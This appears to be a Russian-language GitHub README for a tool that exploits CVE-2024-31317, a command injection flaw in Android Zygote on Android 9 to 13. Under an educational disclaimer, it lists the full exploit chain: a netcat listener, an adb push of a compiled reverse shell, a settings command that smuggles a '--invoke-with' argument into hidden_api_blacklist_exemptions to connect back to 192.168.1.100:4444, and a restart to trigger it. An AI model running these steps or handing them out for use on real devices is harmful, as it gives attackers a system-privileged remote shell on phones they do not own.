
CVE-2024-31317 Инструмент исследования и развертывания уязвимости внедрения команд в Android Zygote | Фреймворк эксплуатации уязвимостей Android 9-13
Этот проект предназначен исключительно для целей безопасности и образования. Использование этого инструмента для несанкционированного тестирования незаконно. Автор не несет ответственности за любое злоупотребление или ущерб.
CVE-2024-31317 — это критическая уязвимость безопасности, затрагивающая устройства Android с версиями от 9 до 13, которая позволяет приложениям с разрешением WRITE_SECURE_SETTINGS получить привилегии системного уровня через внедрение команд.
Этот проект предоставляет подробный технический анализ уязвимости, код доказательства концепции и инструменты для автоматизации развертывания.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# Запуск слушателя
nc -lvnp 4444
# Отправка и выполнение
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# Внедрение полезной нагрузки
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# Триггер уязвимости
adb shell stop && adb shell start
Этот проект предназначен исключительно для целей безопасности и образования. Используя этот инструмент, вы соглашаетесь:
Этот проект лицензирован под лицензией MIT — подробнее см. в файле LICENSE
fcy10012 — GitHub
Справочный проект: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ Если этот проект был вам полезен, поставьте ему звезду!